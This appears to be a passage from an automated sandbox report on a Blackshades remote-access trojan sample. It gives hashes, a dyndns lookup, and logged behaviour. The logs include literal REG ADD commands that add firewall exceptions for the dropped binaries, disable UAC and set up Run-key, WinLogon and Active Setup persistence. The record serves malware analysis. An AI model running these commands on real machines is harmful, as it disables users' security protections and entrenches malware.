C:\Windows\SysWOW64\cmd.exe

cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe" /t REG_SZ /d "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe:*:Enabled:Windows Messanger" /f

C:\Windows\SysWOW64\cmd.exe

cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\cmd.exe

cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Users\Admin\AppData\Roaming\vb6.exe" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\vb6.exe:*:Enabled:Windows Messanger" /f

C:\Windows\SysWOW64\reg.exe

REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe" /t REG_SZ /d "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe:*:Enabled:Windows Messanger" /f

C:\Windows\SysWOW64\reg.exe

REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Users\Admin\AppData\Roaming\vb6.exe" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\vb6.exe:*:Enabled:Windows Messanger" /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 sn0.dyndns.biz udp

Files

memory/2824-0-0x0000000000400000-0x00000000005A5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\JNYVYK.bat

MD5 9fcec2a4ee61953e0d4867261a39ea32
SHA1 d552acf26d9fcc31a9da82ecce503b16a11e9d2a
SHA256 24c5da914d1f429c07ef17dfb7d4d0c90eb060e5a9bd009963fba83b1dd6cae3
SHA512 57d8a88138645780357a88658f21f833efa0ba657dd1fefa6458ba930731e1949216b518f26ab995241837bc7e6eff90b46e5cb5ec34364d2f89db09779e5564

C:\Users\Admin\AppData\Local\Temp\dQcxh.bat

MD5 5d73853d695283e13b412c88ec62984c
SHA1 672379399a80a746a8f0d8043bbf98956101d0ca
SHA256 59884297b763a498c1f55e4ba57f04597ab37677feb9b686839e7553942cf335
SHA512 9043d02ec14cc4869cc8c01562838c11448e2bff42af32ec0a60de76fa8915c3a3a50529ce567c6cb93d2691525b38862257993674c263ed25f6625e370cb2d2

C:\Users\Admin\AppData\Local\Temp\POzYI.bat

MD5 3d470539cbafa762cdb72a4635ad553d
SHA1 4bda3e7de91052dc7d073d8b278ad09ad0d10fa6
SHA256 9f0571e3567d7e1849c7bd5dd7b7a2be942ec44aea6c8bb32d415874b7282691
SHA512 42b168fabd5ddd175ccd143d4f9338880aad03eb22d07fb8a2e13f387015b9eb1d23307bff3ae370c95a5644c88c5e9f7c8b12b332b595c79be069ffc92a448e

C:\Users\Admin\AppData\Local\Temp\aptNl.bat

MD5 09d67635a7674b12183c3f0668ce0cd1
SHA1 c3fe2225cc5198a1c33df0342a95528c2e657a6d
SHA256 972e896e8649a5d2caf286a0d75db99909587b1d2f4683870207b547c3bc02d9
SHA512 b37bdad4fb0e9ab947ea5750337de073907d31156d0d00a1a79392741ced2d1aabf1cc2d92581d7f068266f82cd5b2c10fd7e5c573044e6ce77dea6da6dde321

C:\Program Files (x86)\Internet Explorer\Ieupdate.exe

MD5 ed106f486372d55c7c33b101e2454f79
SHA1 34e24c2fc51bdb222808e6175e8eff051ca8d079
SHA256 1ae94a94136049727b7dbea1b28327d941f1193a5abec2ba61df4fd99f107413
SHA512 d54f5b1710b7464e8cc17d7f4cb5219aaa9437fea71204fdb00b4427f3f3b7c8b45c678dfc403e23ba65d4d071bf2f99ecb4edc664c800d5f16c214f6b1109d3

memory/2440-99-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1880-110-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1880-107-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1880-105-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2440-104-0x0000000000400000-0x000000000045C000-memory.dmp

memory/2440-103-0x0000000000400000-0x000000000045C000-memory.dmp

memory/2440-118-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1880-119-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2440-122-0x0000000000400000-0x000000000045C000-memory.dmp

memory/2440-124-0x0000000000400000-0x000000000045C000-memory.dmp

memory/2440-127-0x0000000000400000-0x000000000045C000-memory.dmp

memory/2440-129-0x0000000000400000-0x000000000045C000-memory.dmp

memory/2440-131-0x0000000000400000-0x000000000045C000-memory.dmp

memory/2440-133-0x0000000000400000-0x000000000045C000-memory.dmp

memory/2440-137-0x0000000000400000-0x000000000045C000-memory.dmp

memory/2440-141-0x0000000000400000-0x000000000045C000-memory.dmp

memory/2440-143-0x0000000000400000-0x000000000045C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2025-02-04 23:36

Reported

2025-02-04 23:39

Platform

win10v2004-20250129-en

Max time kernel

149s

Max time network

139s

Command Line

"C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe"

Signatures

Blackshades

rat blackshades

Blackshades family

blackshades

Blackshades payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe, C:\\Program Files (x86)\\Internet Explorer\\Ieupdate.exe" C:\Windows\SysWOW64\reg.exe N/A

Modifies firewall policy service

defense_evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Program Files (x86)\Internet Explorer\Ieupdate.exe = "C:\\Program Files (x86)\\Internet Explorer\\Ieupdate.exe:*:Enabled:Windows Messanger" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Users\Admin\AppData\Roaming\vb6.exe = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe:*:Enabled:Windows Messanger" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List C:\Windows\SysWOW64\reg.exe N/A

UAC bypass

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\Microsoft = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe" C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A

Boot or Logon Autostart Execution: Active Setup

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{EAFF07AB-FA6F-2EBB-4DBF-CDBBEA4DDCE3}\StubPath = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe" C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\SOFTWARE\Microsoft\Active Setup\Installed Components\{EAFF07AB-FA6F-2EBB-4DBF-CDBBEA4DDCE3} C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\SOFTWARE\Microsoft\Active Setup\Installed Components\{EAFF07AB-FA6F-2EBB-4DBF-CDBBEA4DDCE3}\StubPath = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe" C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{EAFF07AB-FA6F-2EBB-4DBF-CDBBEA4DDCE3} C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\IeUpdate = "C:\\Program Files (x86)\\Internet Explorer\\Ieupdate.exe" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\IeUpdate = "C:\\Program Files (x86)\\Internet Explorer\\Ieupdate.exe" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe" C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe" C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A

Checks whether UAC is enabled

defense_evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3208 set thread context of 1292 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 set thread context of 4768 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Internet Explorer\Ieupdate.txt C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\Ieupdate.txt C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe N/A
File created C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 1 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeTcbPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeSystemtimePrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeBackupPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeAuditPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeUndockPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeManageVolumePrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeImpersonatePrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: 31 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: 32 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: 33 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: 34 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: 35 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4596 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 4596 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 4596 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2496 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2496 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2496 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2496 wrote to memory of 2308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2496 wrote to memory of 2308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2496 wrote to memory of 2308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4596 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 4596 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 4596 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2224 wrote to memory of 2380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2224 wrote to memory of 2380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2224 wrote to memory of 2380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4596 wrote to memory of 4756 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 4596 wrote to memory of 4756 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 4596 wrote to memory of 4756 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 4756 wrote to memory of 4908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4756 wrote to memory of 4908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4756 wrote to memory of 4908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4596 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 4596 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 4596 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 880 wrote to memory of 4952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 880 wrote to memory of 4952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 880 wrote to memory of 4952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4596 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 4596 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 4596 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 1292 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 1292 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 1292 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 1292 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 1292 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 1292 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 1292 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 1292 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 4768 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 4768 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 4768 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 4768 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 4768 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 4768 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 4768 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 4768 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 1292 wrote to memory of 2672 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Windows\SysWOW64\cmd.exe
PID 1292 wrote to memory of 2672 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Windows\SysWOW64\cmd.exe
PID 1292 wrote to memory of 2672 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Windows\SysWOW64\cmd.exe
PID 1292 wrote to memory of 1980 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Windows\SysWOW64\cmd.exe
PID 1292 wrote to memory of 1980 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Windows\SysWOW64\cmd.exe
PID 1292 wrote to memory of 1980 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Windows\SysWOW64\cmd.exe
